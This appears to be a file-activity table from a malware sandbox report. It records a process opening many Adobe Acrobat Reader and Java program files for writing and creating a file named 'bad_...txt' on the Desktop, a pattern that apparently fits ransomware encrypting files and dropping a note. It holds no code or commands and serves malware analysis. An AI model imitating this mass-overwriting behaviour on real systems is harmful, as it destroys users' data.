| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.password.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_2AEAD63AEFB642A0.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
